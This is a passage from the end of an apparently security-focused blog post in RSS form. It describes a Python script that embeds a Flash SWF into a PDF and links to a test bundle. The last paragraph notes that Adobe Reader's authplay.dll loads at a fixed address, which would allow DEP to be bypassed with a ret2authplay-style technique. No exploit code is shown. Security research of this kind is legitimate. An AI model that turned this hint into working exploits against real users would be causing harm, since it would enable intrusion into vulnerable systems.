<p>THAT&#8217;S IT!!! We only need to render the PDF&#8230;</p>
<div style="border:1px solid gray;background:none repeat scroll 0 0 #ffffb3;color:#008099;margin:10px;padding:10px;">
<pre>print doc
</pre>
</div>
<p>Uff! Finally! The resulting python has <A href="http://pastebin.com/f458bd175">this</A> from  ant it runs like this</p>
<div style="font-family:monospace;font-size:small;background:none repeat scroll 0 0 #000000;color:#56ff0b;margin:20px;padding:20px;">python mkSWFPDF.py myFlash.swf myFlashVarsInAfile.vars &gt;SWFPDF.pdf</div>
<p>And it works!!!  I took a swf from the web and put it, here is the screenshot&#8230;</p>
<p><a href='http://feliam.files.wordpress.com/2010/02/swfpdf.pdf'><img src="http://feliam.files.wordpress.com/2010/02/swfpdf.png?w=460" alt="" /> </a></p>
<p>And <A href="http://sites.google.com/site/felipeandresmanzano/swfPDF.tar.gz">HERE</A> you have the test bundle with all this.</p>
<p>Untested and related: Also in my tests the authplay.dll, the dll providing all  the Flash functionality to the Adobe Reader, is loaded at a fixed  address in XPSPx when in IE or stand alone, wich means you can bypass  DEP trough some ret2authplay.dll. Also when in stand alone the Reader dosn&#8217;t opt in for DEP</p>
<p>f/<!--more--></p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/feliam.wordpress.com/165/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/feliam.wordpress.com/165/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=feliam.wordpress.com&#038;blog=11378149&#038;post=165&#038;subd=feliam&#038;ref=&#038;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://feliam.wordpress.com/2010/02/11/flash-on-a-pdf-with-minipdf-py/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/194a46a39d3b23da4a451128da9051ed?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">feliam</media:title>
		</media:content>

		<media:content url="http://feliam.files.wordpress.com/2010/02/flashlogo1.jpg" medium="image" />

		<media:content url="http://feliam.files.wordpress.com/2010/01/basepdfpdf.png?w=190" medium="image" />

		<media:content url="http://feliam.files.wordpress.com/2010/02/swfpdf.png" medium="image" />
	</item>
	</channel>
</rss>
